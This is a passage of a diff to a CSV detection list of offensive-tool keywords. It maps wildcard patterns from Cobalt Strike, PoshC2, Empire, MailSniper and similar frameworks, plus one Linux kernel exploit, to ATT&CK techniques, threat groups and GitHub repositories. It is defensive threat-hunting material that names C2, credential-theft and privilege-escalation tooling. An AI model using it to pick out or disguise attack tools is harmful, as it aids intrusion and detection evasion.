CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" 
+"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_rooot.c*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" -"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - 
T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens 
- Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 